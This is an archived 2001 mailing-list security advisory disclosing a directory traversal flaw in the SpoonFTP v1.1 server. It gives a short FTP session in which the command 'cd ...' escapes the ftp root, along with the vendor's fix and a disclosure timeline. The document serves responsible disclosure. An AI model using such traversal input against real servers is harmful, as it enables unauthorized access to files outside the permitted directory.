OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: joetestahushmail.com
Date: Thu Sep 20 2001 - 11:31:12 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----

    Vulnerability in SpoonFTP




        Overview

    SpoonFTP v1.1 is an ftp server available from http://www.pi-soft.com/.
    A vulnerability exists which allows a remote user to break out of the ftp root.




        Details

    The following excerpt demonstrates the problem; an ftp root of 'D:\root\root\' was
    used:


    >ftp localhost
    Connected to xxxxxxxx.rh.rit.edu.
    220 SpoonFTP V1.1
    User (xxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required.
    Password:
    230 User logged in, proceed.
    ftp> pwd
    257 "/" is current directory.
    ftp> cd ...
    250 CWD command successful.
    ftp> pwd
    257 "/..." is current directory.
    ftp>




        Solution

    Upgrade to V1.1.0.1 at: http://www.pi-soft.com/spoonftp/sftp.exe




        Vendor Status

    Pi-Soft Consulting, LLC was contacted via <supportpi-soft.com> on Tuesday,
    September 18, 2001. This vulnerability was fixed in a matter of hours.






        - Joe Testa

    e-mail: joetestahushmail.com
    web page: http://hogs.rit.edu/~joet/
    AIM: LordSpankatron


    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.0

    wl0EARECAB0FAjuqRIsWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNBjk
    AJ99Iu7Ntbv4M1lYS3KZOEyNkK4a7QCeIromIWdZdj2Wc5qySXbKLHZZlmk=
    =hK2i
    -----END PGP SIGNATURE-----